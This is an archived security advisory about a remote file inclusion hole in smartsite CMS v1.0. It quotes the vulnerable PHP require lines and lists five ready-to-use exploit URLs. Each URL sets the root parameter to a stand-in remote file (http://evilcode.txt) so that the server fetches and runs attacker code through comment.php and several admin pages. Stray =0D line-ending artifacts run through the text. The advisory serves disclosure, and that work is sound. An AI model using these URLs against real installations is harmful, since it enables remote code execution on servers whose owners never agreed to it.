TUCoPS :: Web :: CMS / Portals :: b06-3328.htm

smartsite cms v1.0 Remote File include
smartsite cms v1.0 Remote File include
smartsite cms v1.0 Remote File include


smartsite cms  v1.0 Remote File include=0D
-------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE     =0D
Arabian Security Team                 =0D
-------------------------------------------------=0D
site of script:www.smartsitecms.net=0D 
-------------------------------------------------=0D
Vulnerable: smartsite cms  v1.0=0D
-------------------------------------------------=0D
vulnerable code:=0D
----------------------=0D
1-in comment.php :=0D
require($root . "include/inc_foot.php");=0D
---------------------------------------=0D
2-in /admin/comedit.php :=0D
else	=0D
	{=0D
		require('../include/inc_accessfail.php');=0D
	}=0D
	?>=0D
	 =0D
	=0D
	www.example.com/(path)/comment.php?root=http://evilcode.txt?=0D 
www.example.com/(path)/admin/test.php?root=http://evilcode.txt?=0D 
www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=http://evilcode.txt?=0D 
www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilcode.txt?=0D 
www.example.com/(path)/admin/comedit.php?root=http://evilcode.txt?=0D 
--------------------------------------------------=0D
Discovered By CrAsh_oVeR_rIdE=0D
E-mail:KARKOR23@hotmail.com=0D 
Site:www.lezr.com=0D 
Greetz:KING-HACKER,YOUNG=0D
HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3 AND ALL LEZR.COM Member

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH